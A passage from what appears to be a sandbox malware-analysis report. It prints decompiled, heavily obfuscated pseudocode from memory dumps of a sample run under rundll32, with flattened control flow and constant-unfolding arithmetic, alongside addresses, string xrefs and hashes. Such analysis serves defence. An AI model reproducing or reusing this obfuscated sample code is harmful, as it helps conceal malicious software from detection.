				_v1080 = _v1080 / _t239;
				_v1080 = _v1080 ^ 0x00001f1a;
				_v1136 = 0x65d1;
				_v1136 = _v1136 >> 7;
				_v1136 = _v1136 >> 3;
				_v1136 = _v1136 | 0xb1d65351;
				_v1136 = _v1136 ^ 0xb1d66160;
				_v1092 = 0x9227;
				_v1092 = _v1092 ^ 0xf0d4d9ed;
				_v1092 = _v1092 >> 6;
				_v1092 = _v1092 ^ 0x03c34d93;
				_v1064 = 0x7d06;
				_v1064 = _v1064 | 0x78b1f3a9;
				_v1064 = _v1064 ^ 0x78b19bbc;
				_v1076 = 0x3a45;
				_v1076 = _v1076 ^ 0x8b32e14f;
				_v1076 = _v1076 ^ 0x8b32a728;
				_v1084 = 0x40e7;
				_v1084 = _v1084 >> 0xf;
				_v1084 = _v1084 ^ 0x000056c5;
				_v1140 = 0x14b6;
				_v1140 = _v1140 + 0x82db;
				_v1140 = _v1140 + 0xffff6955;
				_v1140 = _v1140 | 0xc7e9aa62;
				_v1140 = _v1140 ^ 0xc7e9d185;
				_v1068 = 0xe08d;
				_v1068 = _v1068 ^ 0x0cc611ab;
				_v1068 = _v1068 ^ 0x0cc6d2cf;
				_v1108 = 0x428e;
				_v1108 = _v1108 ^ 0x2aea69d2;
				_v1108 = _v1108 * 0x68;
				_v1108 = _v1108 ^ 0x6f218659;
				_v1100 = 0x24cb;
				_v1100 = _v1100 ^ 0x57e30eba;
				_v1100 = _v1100 << 0xe;
				_v1100 = _v1100 ^ 0xca9c0614;
				_v1116 = 0x3dd7;
				_v1116 = _v1116 + 0x57d7;
				_v1116 = _v1116 * 0x14;
				_v1116 = _v1116 ^ 0x000bfaaf;
				_v1104 = 0x5f98;
				_v1104 = _v1104 | 0xb14dd167;
				_v1104 = _v1104 ^ 0x023b643c;
				_v1104 = _v1104 ^ 0xb376dba6;
				_v1144 = 0x61d9;
				_v1144 = _v1144 + 0x900;
				_v1144 = _v1144 + 0x298f;
				_v1144 = _v1144 + 0x5e62;
				_v1144 = _v1144 ^ 0x0000cef3;
				_v1132 = 0xb8f7;
				_v1132 = _v1132 >> 0xa;
				_v1132 = _v1132 << 0xc;
				_v1132 = _v1132 | 0x7a068a91;
				_v1132 = _v1132 ^ 0x7a06e880;
				_v1060 = 0xb6ca;
				_v1060 = _v1060 | 0x34ba312c;
				_v1060 = _v1060 ^ 0x34bab1b7;
				_v1112 = 0x7535;
				_v1112 = _v1112 ^ 0xf4f555d1;
				_v1112 = _v1112 + 0x341f;
				_v1112 = _v1112 ^ 0xf4f507bd;
				_v1120 = 0xf80;
				_v1120 = _v1120 + 0xd656;
				_v1120 = _v1120 ^ 0x1fb6d00a;
				_v1120 = _v1120 ^ 0x1fb65e63;
				_v1128 = 0xca3d;
				_t240 = 0x4b;
				_v1128 = _v1128 * 0xa;
				_v1128 = _v1128 << 1;
				_v1128 = _v1128 << 9;
				_v1128 = _v1128 ^ 0x1f99ed7d;
				_v1088 = 0xf1f3;
				_v1088 = _v1088 + 0x83;
				_v1088 = _v1088 << 0xf;
				_v1088 = _v1088 ^ 0x793b4332;
				_v1072 = 0xc19e;
				_v1072 = _v1072 / _t240;
				_v1072 = _v1072 ^ 0x00000807;
				_v1096 = 0x5df5;
				_t241 = 0x65;
				_v1096 = _v1096 / _t241;
				_v1096 = _v1096 + 0xb24c;
				_v1096 = _v1096 ^ 0x0000928e;
				_v1124 = 0x49f0;
				_v1124 = _v1124 + 0x7719;
				_v1124 = _v1124 << 0xb;
				_v1124 = _v1124 ^ 0x0608131f;
				do {
					while(_t217 != 0xcdcbb46) {
						if(_t217 == 0xe5d9d0e) {
							_t206 = E0044CBE7( &_v520, _v1112, __eflags, _v1120, _v1128,  &_v1040);
							_t244 =  &(_t244[3]);
							__eflags = _t206;
							_t238 =  !=  ? 1 : _t238;
							_t217 = 0x23d64a19;
							continue;
						} else {
							if(_t217 == 0xe97c3dd) {
								_push(_t217);
								E0043DFD8(_v1080,  &_v520, __eflags, _v1136, _v1092);
								_t244 =  &(_t244[3]);
								_t217 = 0x3342c16f;
								continue;
							} else {
								if(_t217 == 0x23d64a19) {
									E004447B5(_v1088,  &_v1040, _v1072, _v1096, _v1124);
								} else {
									_t251 = _t217 - 0x3342c16f;
									if(_t217 != 0x3342c16f) {
										goto L10;
									} else {
										_push(0x4312d8);
										_push(_v1140);
										_push(_v1084);
										_t210 = E00435DFC(_v1064, _v1076, _t251);
										_t175 =  &_v1116; // 0x793b4332
										E0043A4D7(_t251, _v1108, _v1100,  *_t175, _v1104, _t210,  *0x451088 + 0x254,  &_v1040,  *0x451088 + 0x38);
										E00440D6D(_v1144, _v1132, _v1060, _t210);
										_t244 =  &(_t244[0xd]);
										_t217 = 0xe5d9d0e;
										continue;
									}
								}
							}
						}
						L13:
						return _t238;
					}
					_t217 = 0xe97c3dd;
					L10:
					__eflags = _t217 - 0x1b50eba4;
				} while (__eflags != 0);
				goto L13;
			}

0x0043d2dd
0x0043d2e3
0x0043d2ed
0x0043d2f5
0x0043d2fa
0x0043d306
0x0043d308
0x0043d30c
0x0043d31a
0x0043d31d
0x0043d321
0x0043d329
0x0043d331
0x0043d336
0x0043d33b
0x0043d343
0x0043d34b
0x0043d353
0x0043d35b
0x0043d360
0x0043d368
0x0043d370
0x0043d378
0x0043d380
0x0043d388
0x0043d390
0x0043d398
0x0043d3a0
0x0043d3a5
0x0043d3ad
0x0043d3b5
0x0043d3bd
0x0043d3c5
0x0043d3cd
0x0043d3d5
0x0043d3dd
0x0043d3e5
0x0043d3ed
0x0043d3f5
0x0043d402
0x0043d406
0x0043d40e
0x0043d416
0x0043d41e
0x0043d423
0x0043d42b
0x0043d433
0x0043d440
0x0043d444
0x0043d44c
0x0043d454
0x0043d45c
0x0043d464
0x0043d46c
0x0043d474
0x0043d47c
0x0043d484
0x0043d48c
0x0043d494
0x0043d49c
0x0043d4a1
0x0043d4a6
0x0043d4ae
0x0043d4b6
0x0043d4be
0x0043d4c6
0x0043d4ce
0x0043d4d6
0x0043d4de
0x0043d4e6
0x0043d4ee
0x0043d4f6
0x0043d4fe
0x0043d508
0x0043d515
0x0043d529
0x0043d52c
0x0043d530
0x0043d534
0x0043d539
0x0043d541
0x0043d549
0x0043d551
0x0043d556
0x0043d55e
0x0043d56e
0x0043d572
0x0043d57a
0x0043d586
0x0043d589
0x0043d58d
0x0043d595
0x0043d59d
0x0043d5a5
0x0043d5ad
0x0043d5b2
0x0043d5ba
0x0043d5ba
0x0043d5cc
0x0043d69d
0x0043d6a4
0x0043d6a8
0x0043d6aa
0x0043d6ad
0x00000000
0x0043d5d2
0x0043d5d4
0x0043d662
0x0043d676
0x0043d67b
0x0043d67e
0x00000000
0x0043d5da
0x0043d5e0
0x0043d6db
0x0043d5e6
0x0043d5e6
0x0043d5e8
0x00000000
0x0043d5ee
0x0043d5ee
0x0043d5f3
0x0043d5f7
0x0043d603
0x0043d628
0x0043d63b
0x0043d650
0x0043d655
0x0043d658
0x00000000
0x0043d658
0x0043d5e8
0x0043d5e0
0x0043d5d4
0x0043d6e3
0x0043d6ef
0x0043d6ef
0x0043d6b7
0x0043d6b9
0x0043d6b9
0x0043d6b9
0x00000000

Strings

b^, xrefs: 0043D484
5u, xrefs: 0043D4CE
E:, xrefs: 0043D380
2C;y, xrefs: 0043D628

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 2C;y$5u$E:$b^
API String ID: 0-4114578400
Opcode ID: a87d33d16a2752b0dd001b3b9fb3b3e3250faddd497f5b6f71a91a72beadd55e
Instruction ID: fd4bf5daa2fe533a97ce01c71c567116a25c2335ccc4d22e663e6d342355ff2f
Opcode Fuzzy Hash: a87d33d16a2752b0dd001b3b9fb3b3e3250faddd497f5b6f71a91a72beadd55e
Instruction Fuzzy Hash: F8A1117150D3819FD358CF62D58A45BBBF1BBC5708F40991DF29A862A0C7B98A09CF47

Uniqueness

Uniqueness Score: -1.00%

Function 0017C851, Relevance: 5.2, Strings: 4, Instructions: 197COMMON

Download Yara Rule

Strings

2C;y, xrefs: 0017CB9C
b^, xrefs: 0017C9F8
E:, xrefs: 0017C8F4
5u, xrefs: 0017CA42

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 2C;y$5u$E:$b^
API String ID: 0-4114578400
Opcode ID: db5f780c1be03f6b24e7044e1de048fbd714646e60e300b2392a89149157520b
Instruction ID: 48a42b92f195c718597350182a43ea1619ff61616571cb8c59a38c6eee5c553a
Opcode Fuzzy Hash: db5f780c1be03f6b24e7044e1de048fbd714646e60e300b2392a89149157520b
Instruction Fuzzy Hash: B4A1107150D3819FD399CF62C58A45BBBF1BBC5748F40891CF29A86260C7B98A09CF87

Uniqueness

Uniqueness Score: -1.00%

Function 0043BE74, Relevance: 5.2, Strings: 4, Instructions: 168
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E0043BE74(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				void* _t140;
				void* _t156;
				void* _t157;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				signed int _t168;
				void* _t171;
				void* _t195;
				void* _t196;
				signed int* _t199;

				_push(_a8);
				_t195 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00442550(_t140);
				_v108 = 0xfc4f;
				_t199 =  &(( &_v116)[4]);
				_v108 = _v108 | 0x4da9a639;
				_v108 = _v108 + 0x67dc;
				_t196 = 0;
				_v108 = _v108 << 0xc;
				_t171 = 0x2e363e63;
				_v108 = _v108 ^ 0xa6659d9d;
				_v72 = 0xf402;
				_v72 = _v72 ^ 0x5f9ae956;
				_v72 = _v72 ^ 0x5f9a291f;
				_v112 = 0xe152;
				_v112 = _v112 | 0xaffcdffa;
				_t163 = 0x1d;
				_v112 = _v112 / _t163;
				_v112 = _v112 ^ 0x0611b87a;
				_v116 = 0x6c25;
				_v116 = _v116 ^ 0x0c91b378;
				_v116 = _v116 + 0x2f8;
				_v116 = _v116 | 0x69d7e26c;
				_v116 = _v116 ^ 0x6dd79b31;
				_v104 = 0x7ef1;
				_v104 = _v104 + 0xffff4bb2;
				_t164 = 0x4f;
				_v104 = _v104 / _t164;
				_t165 = 0x4d;
				_v104 = _v104 / _t165;
				_v104 = _v104 ^ 0x000acb92;
				_v88 = 0xf338;
				_t166 = 0x31;
				_v88 = _v88 / _t166;
				_v88 = _v88 >> 7;
				_v88 = _v88 ^ 0x00001bb8;
				_v100 = 0x39ac;
				_v100 = _v100 >> 5;
				_t167 = 0x6a;
				_v100 = _v100 * 0x73;
				_v100 = _v100 + 0xffffcfed;
				_v100 = _v100 ^ 0x0000c292;
				_v84 = 0xa231;
				_v84 = _v84 + 0x99eb;
				_v84 = _v84 / _t167;
				_v84 = _v84 ^ 0x000046d3;
				_v76 = 0xf128;
				_v76 = _v76 + 0xffff9193;
				_v76 = _v76 >> 9;
				_v76 = _v76 ^ 0x00001e23;
				_v92 = 0x62a3;
				_t168 = 0x33;
				_v92 = _v92 / _t168;
				_v92 = _v92 ^ 0x5bc1cdff;
				_v92 = _v92 + 0xffff8115;
				_v92 = _v92 ^ 0x5bc105bf;
				_v80 = 0x9d4f;
				_v80 = _v80 << 0xf;
				_v80 = _v80 + 0xffff2359;
				_v80 = _v80 ^ 0x4ea6cb3e;
				_v96 = 0x4976;
				_v96 = _v96 + 0x63d7;
				_v96 = _v96 + 0xf4f6;
				_v96 = _v96 + 0xffffaa83;
				_v96 = _v96 ^ 0x00013bfc;
				do {
					while(_t171 != 0xc31af3f) {
						if(_t171 == 0x1ee6df64) {
							_t157 = E0043BAA2( &_v68, _v104, _v88, _t195);
							_t199 =  &(_t199[2]);
							__eflags = _t157;
							if(__eflags != 0) {
								_t171 = 0xc31af3f;
								continue;
							}
						} else {
							if(_t171 == 0x1ee95fdc) {
								E0043FEE3(_a8,  &_v68, _v108, _v72, _v112, _v116);
								_t199 =  &(_t199[4]);
								_t171 = 0x1ee6df64;
								continue;
							} else {
								if(_t171 == 0x2c795783) {
									_t136 = _t195 + 8; // 0x301e42
									__eflags = E0043F914(_v76, _v92, __eflags, _v80, _t136, _v96,  &_v68);
									_t196 =  !=  ? 1 : _t196;
								} else {
									if(_t171 != 0x2e363e63) {
										goto L13;
									} else {
										_t171 = 0x1ee95fdc;
										continue;
									}
								}
							}
						}
						L16:
						return _t196;
					}
					_t130 = _t195 + 4; // 0x301e3e
					_t156 = E0043BAA2( &_v68, _v100, _v84, _t130);
					_t199 =  &(_t199[2]);
					__eflags = _t156;
					if(__eflags == 0) {
						_t171 = 0x26c6c5b0;
						goto L13;
					} else {
						_t171 = 0x2c795783;
						continue;
					}
					goto L16;
					L13:
					__eflags = _t171 - 0x26c6c5b0;
				} while (__eflags != 0);
				goto L16;
			}

0x0043be7b
0x0043be82
0x0043be84
0x0043be8b
0x0043be8c
0x0043be8d
0x0043be92
0x0043be9a
0x0043be9d
0x0043bea7
0x0043beaf
0x0043beb1
0x0043beb6
0x0043bebb
0x0043bec3
0x0043becb
0x0043bed3
0x0043bedb
0x0043bee3
0x0043bef1
0x0043bef6
0x0043befc
0x0043bf04
0x0043bf0c
0x0043bf14
0x0043bf1c
0x0043bf24
0x0043bf2c
0x0043bf34
0x0043bf40
0x0043bf45
0x0043bf4f
0x0043bf54
0x0043bf5a
0x0043bf62
0x0043bf6e
0x0043bf73
0x0043bf79
0x0043bf7e
0x0043bf86
0x0043bf8e
0x0043bf98
0x0043bf99
0x0043bf9d
0x0043bfa5
0x0043bfad
0x0043bfb5
0x0043bfc3
0x0043bfc7
0x0043bfcf
0x0043bfd7
0x0043bfdf
0x0043bfe4
0x0043bfee
0x0043bffc
0x0043c009
0x0043c00d
0x0043c015
0x0043c01d
0x0043c025
0x0043c02d
0x0043c032
0x0043c03a
0x0043c042
0x0043c04a
0x0043c052
0x0043c05a
0x0043c062
0x0043c06a
0x0043c06a
0x0043c074
0x0043c0c9
0x0043c0ce
0x0043c0d1
0x0043c0d3
0x0043c0d5
0x00000000
0x0043c0d5
0x0043c076
0x0043c078
0x0043c0ad
0x0043c0b2
0x0043c0b5
0x00000000
0x0043c07a
0x0043c080
0x0043c11b
0x0043c136
0x0043c138
0x0043c086
0x0043c08c
0x00000000
0x0043c08e
0x0043c08e
0x00000000
0x0043c08e
0x0043c08c
0x0043c080
0x0043c078
0x0043c13c
0x0043c144
0x0043c144
0x0043c0d9
0x0043c0e9
0x0043c0ee
0x0043c0f1
0x0043c0f3
0x0043c0ff
0x00000000
0x0043c0f5
0x0043c0f5
0x00000000
0x0043c0f5
0x00000000
0x0043c104
0x0043c104
0x0043c104
0x00000000

Strings

c>6., xrefs: 0043C086
vI, xrefs: 0043C042
c>6., xrefs: 0043BEB6
%l, xrefs: 0043BF04

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: %l$c>6.$c>6.$vI
API String ID: 0-1842334051
Opcode ID: e35383a8ff9d3873cfa8fad072e536b5cf3e084f98ebf9b090aa7fc1caa2cc9a
Instruction ID: cc99b58fcf831b87407f0e89bde16b7b91319d8991735b7006138f22bcaede03
Opcode Fuzzy Hash: e35383a8ff9d3873cfa8fad072e536b5cf3e084f98ebf9b090aa7fc1caa2cc9a
Instruction Fuzzy Hash: 5A719971508341DBE358CF21C88591FBBE1FBD8718F505A2DF586A62A0D379CA19CB4B

Uniqueness

Uniqueness Score: -1.00%

Function 00441090, Relevance: 5.2, Strings: 4, Instructions: 168
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00441090(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				unsigned int _v64;
				signed int _v68;
				void* _t140;
				void* _t158;
				intOrPtr* _t165;
				void* _t167;
				void* _t183;
				void* _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int _t188;
				signed int _t189;
				signed int* _t192;

				_t165 = _a4;
				_push(_a8);
				_t183 = __ecx;
				_push(_t165);
				_push(__edx);
				_push(__ecx);
				E00442550(_t140);
				_v8 = 0x6f9ade;
				_t184 = 0;
				_v4 = _v4 & 0;
				_t192 =  &(( &_v68)[4]);
				_v44 = 0x982a;
				_v44 = _v44 + 0xbc31;
				_t167 = 0x2bf8d881;
				_v44 = _v44 | 0xf90c86f7;
				_v44 = _v44 ^ 0xf90dd6fe;
				_v28 = 0x630d;
				_t185 = 0x43;
				_v28 = _v28 * 0x4e;
				_v28 = _v28 ^ 0x001e2df7;
				_v56 = 0x19d0;
				_v56 = _v56 * 0x38;
				_v56 = _v56 + 0x1bd7;
				_v56 = _v56 ^ 0x4b810ed7;
				_v56 = _v56 ^ 0x4b84d952;
				_v32 = 0xc9e1;
				_v32 = _v32 + 0xabf9;
				_v32 = _v32 ^ 0x000119f3;
				_v36 = 0x329d;
				_v36 = _v36 >> 1;
				_v36 = _v36 ^ 0x00004114;
				_v60 = 0xf614;
				_v60 = _v60 / _t185;
				_t186 = 0x78;
				_v60 = _v60 * 0x44;
				_v60 = _v60 + 0xe907;
				_v60 = _v60 ^ 0x0001d7a4;
				_v48 = 0xee3;
				_v48 = _v48 * 0x48;
				_v48 = _v48 ^ 0xc9a4a55a;
				_v48 = _v48 ^ 0xc9a0a1d8;
				_v64 = 0x7fce;
				_v64 = _v64 / _t186;
				_t187 = 0x11;
				_v64 = _v64 / _t187;
				_v64 = _v64 >> 6;
				_v64 = _v64 ^ 0x000063f0;
				_v68 = 0xa533;
				_t188 = 0x65;
				_v68 = _v68 / _t188;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 * 0x3c;
				_v68 = _v68 ^ 0x000027f2;
				_v16 = 0x6517;
				_v16 = _v16 * 0x61;
				_v16 = _v16 ^ 0x00262f84;
				_v20 = 0xf07;
				_v20 = _v20 + 0xffffaba9;
				_v20 = _v20 ^ 0xffffe5ca;
				_v24 = 0x4d0a;
				_v24 = _v24 << 0xe;
				_v24 = _v24 ^ 0x1342cb05;
				_v40 = 0xdf77;
				_v40 = _v40 >> 2;
				_v40 = _v40 + 0xffffea10;
				_v40 = _v40 ^ 0x0000626b;
				_v52 = 0xc020;
				_v52 = _v52 | 0x928f446b;
				_t189 = 0x74;
				_v52 = _v52 / _t189;
				_v52 = _v52 | 0x14dbb019;
				_v52 = _v52 ^ 0x15dbc5e6;
				do {
					while(_t167 != 0x94f4759) {
						if(_t167 == 0xc9fc140) {
							_push(_t167);
							_t184 = E004354FB(_v12);
							if(_t184 != 0) {
								_t167 = 0x38319c56;
								continue;
							}
						} else {
							if(_t167 == 0x2bf8d881) {
								_t167 = 0x94f4759;
								continue;
							} else {
								if(_t167 != 0x38319c56) {
									goto L13;
								} else {
									E00439C40( &_v12, _v16, _t183, _v20, _v24, _t167, _v28, _v40, _t184, _t167, _v52);
									 *_t165 = _v12;
								}
							}
						}
						L6:
						return _t184;
					}
					_t158 = E00439C40( &_v12, _v56, _t183, _v32, _v36, _t167, _v44, _v60, 0, _t167, _v48);
					_t192 =  &(_t192[0xa]);
					if(_t158 == 0) {
						_t167 = 0x2cce3dbc;
						goto L13;
					} else {
						_t167 = 0xc9fc140;
						continue;
					}
					goto L6;
					L13:
				} while (_t167 != 0x2cce3dbc);
				goto L6;
			}

0x00441094
0x0044109b
0x0044109f
0x004410a1
0x004410a2
0x004410a3
0x004410a4
0x004410a9
0x004410b1
0x004410b3
0x004410b7
0x004410ba
0x004410c4
0x004410cc
0x004410d1
0x004410d9
0x004410e1
0x004410f0
0x004410f3
0x004410f7
0x004410ff
0x0044110c
0x00441110
0x00441118
0x00441120
0x00441128
0x00441130
0x00441138
0x00441140
0x00441148
0x0044114c
0x00441154
0x00441164
0x0044116d
0x00441170
0x00441174
0x0044117c
0x00441184
0x00441191
0x00441195
0x0044119d
0x004411a5
0x004411b5
0x004411bd
0x004411c2
0x004411c8
0x004411cd
0x004411d5
0x004411e1
0x004411e4
0x004411e8
0x004411f2
0x004411f6
0x004411fe
0x0044120b
0x0044120f
0x00441219
0x00441221
0x00441229
0x00441231
0x00441239
0x0044123e
0x00441246
0x0044124e
0x00441253
0x0044125b
0x00441263
0x0044126b
0x00441279
0x00441281
0x00441285
0x0044128d
0x00441295
0x00441295
0x0044129f
0x004412fd
0x00441303
0x00441308
0x0044130a
0x00000000
0x0044130a
0x004412a1
0x004412a7
0x004412ed
0x00000000
0x004412a9
0x004412af
0x00000000
0x004412b5
0x004412d5
0x004412e1
0x004412e1
0x004412af
0x004412a7
0x004412e4
0x004412ec
0x004412ec
0x00441332
0x00441337
0x0044133c
0x00441348
0x00000000
0x0044133e
0x0044133e
0x00000000
0x0044133e
0x00000000
0x0044134d
0x0044134d
0x00000000

Strings

M, xrefs: 00441231
kb, xrefs: 0044125B
YGO, xrefs: 0044127C
c, xrefs: 004410E1

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: M$c$YGO$kb
API String ID: 0-1506048532
Opcode ID: 5d4ebc2505cff4899b4b22ae4471b08fad847f46fa3111b0232cb516bf6688a7
Instruction ID: 5267763dbfd2ff8df6dc2e1ac93fd1ca587255a6541b0f8375c17fe4a06691cc
Opcode Fuzzy Hash: 5d4ebc2505cff4899b4b22ae4471b08fad847f46fa3111b0232cb516bf6688a7
Instruction Fuzzy Hash: F27154711083419FE358CF65C88991FBFE1FBC5748F404A1EF185A6260D3BACA498B4A

Uniqueness

Uniqueness Score: -1.00%

Function 00180604, Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

M, xrefs: 001807A5
kb, xrefs: 001807CF
YGO, xrefs: 001807F0
c, xrefs: 00180655

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: M$c$YGO$kb
API String ID: 0-1506048532
Opcode ID: f3918612a07dbf820744b97fdc2a3ffe60349661cd5382ba9ec48ca095532492
Instruction ID: d226b7221d830ea4d5acfbb5c58aa37a8bde7652655d4e54b97c5031906b97a6
Opcode Fuzzy Hash: f3918612a07dbf820744b97fdc2a3ffe60349661cd5382ba9ec48ca095532492
Instruction Fuzzy Hash: 7C7164715083859FD358CF25C88941FBBF1FBCA758F408A1DF18596260D3BACA498F86

Uniqueness

Uniqueness Score: -1.00%

Function 0017B3E8, Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

c>6., xrefs: 0017B42A
%l, xrefs: 0017B478
vI, xrefs: 0017B5B6
c>6., xrefs: 0017B5FA

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: %l$c>6.$c>6.$vI
API String ID: 0-1842334051
Opcode ID: 24a708c09509732ed6a1976b4a33833c542d2d2f6f4fa2fdc461646d9a68ae0e
Instruction ID: d6718ed47b821b9cdbbbcab5c9020ffaf08a23e1a1a8787deb16e81bfdc2be88
Opcode Fuzzy Hash: 24a708c09509732ed6a1976b4a33833c542d2d2f6f4fa2fdc461646d9a68ae0e
Instruction Fuzzy Hash: 8971987210C3419BD398CF21C8CA91FBBF1FBD8758F504A1CF589962A0D3758A598B47

Uniqueness

Uniqueness Score: -1.00%

Function 00183D29, Relevance: 5.1, Strings: 4, Instructions: 112COMMON

Download Yara Rule

Strings

x[, xrefs: 00183DAB
>4, xrefs: 00183E97
Z`, xrefs: 00183D8B
*Bl, xrefs: 00183E26

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: *Bl$>4$Z`$x[
API String ID: 0-788090992
Opcode ID: 36f0ac18098e83fdd7a7180336d11f300c49605d38501b2fd70b3092a2ba1ae5
Instruction ID: faa868bafcbd5e54f30968332ab2308bad7bbc81e8d59e88d1fb37440a004ef3
Opcode Fuzzy Hash: 36f0ac18098e83fdd7a7180336d11f300c49605d38501b2fd70b3092a2ba1ae5
Instruction Fuzzy Hash: D8510FB2C0130EABDF54CFE5D98A4EEBBB1FB18314F208158E515762A0D3B95A45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00439D2F, Relevance: 3.9, Strings: 3, Instructions: 197
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00439D2F(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr* _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr* _t178;
				intOrPtr _t188;
				intOrPtr _t189;
				signed int _t191;
				intOrPtr _t195;
				intOrPtr _t196;
				signed int _t215;
				signed int _t216;
				signed int _t217;
				signed int _t218;
				intOrPtr _t219;
				void* _t221;
				signed int _t222;
				intOrPtr _t223;
				intOrPtr _t224;
				signed int* _t225;

				_t189 = __ecx;
				_t225 =  &_v84;
				_v8 = __edx;
				_v24 = __ecx;
				_v84 = 0x52c3;
				_v84 = _v84 + 0xffffa290;
				_t221 = 0x1b1ec7af;
				_v20 = _v20 & 0x00000000;
				_t215 = 0x28;
				_v84 = _v84 / _t215;
				_v84 = _v84 ^ 0xc70a2cbb;
				_v84 = _v84 ^ 0xc16c29fd;
				_v60 = 0xef49;
				_t216 = 0x4f;
				_v60 = _v60 / _t216;
				_v60 = _v60 + 0x8f43;
				_v60 = _v60 ^ 0x0000e631;
				_v52 = 0xdf8d;
				_v52 = _v52 | 0x89b2267c;
				_v52 = _v52 ^ 0x13e61697;
				_v52 = _v52 ^ 0x9a54c391;
				_v80 = 0xa7ea;
				_v80 = _v80 >> 2;
				_v80 = _v80 + 0xffff1a0f;
				_v80 = _v80 ^ 0xf694800b;
				_v80 = _v80 ^ 0x096bf198;
				_v56 = 0x4df7;
				_t217 = 0x58;
				_v56 = _v56 * 0x24;
				_v56 = _v56 >> 0x10;
				_v56 = _v56 ^ 0x00005064;
				_v44 = 0x5793;
				_v44 = _v44 << 3;
				_v44 = _v44 | 0x1a78ccf0;
				_v44 = _v44 ^ 0x1a7ad28a;
				_v48 = 0x4fde;
				_v48 = _v48 / _t217;
				_v48 = _v48 * 0x14;
				_v48 = _v48 ^ 0x0000583a;
				_v32 = 0x8af0;
				_v32 = _v32 + 0xffff32af;
				_v32 = _v32 ^ 0xffffb04c;
				_v36 = 0x75dd;
				_v36 = _v36 + 0x1ee0;
				_v36 = _v36 ^ 0x0000d042;
				_v72 = 0x8173;
				_v72 = _v72 ^ 0xf613a128;
				_v72 = _v72 >> 0xb;
				_v72 = _v72 | 0xdda636e2;
				_v72 = _v72 ^ 0xddbe8dc6;
				_v76 = 0xe20a;
				_v76 = _v76 * 0x6c;
				_v76 = _v76 << 0xc;
				_v76 = _v76 >> 0x10;
				_v76 = _v76 ^ 0x0000f2d9;
				_v64 = 0x5aba;
				_v64 = _v64 << 5;
				_v64 = _v64 ^ 0x995ec148;
				_v64 = _v64 + 0xffffc53f;
				_v64 = _v64 ^ 0x9955459c;
				_v68 = 0xe247;
				_v68 = _v68 ^ 0xa76713ca;
				_t218 = 0x3b;
				_t224 = _v8;
				_t219 = _v4;
				_t188 = _v8;
				_v68 = _v68 / _t218;
				_v68 = _v68 >> 8;
				_v68 = _v68 ^ 0x0002c308;
				_v40 = 0xd4fd;
				_v40 = _v40 * 0x1a;
				_v40 = _v40 ^ 0x6afb2fbd;
				_v40 = _v40 ^ 0x6aee8e0f;
				_t174 = _v28;
				L1:
				while(1) {
					do {
						while(_t221 != 0x145613b1) {
							if(_t221 == 0x146a35d3) {
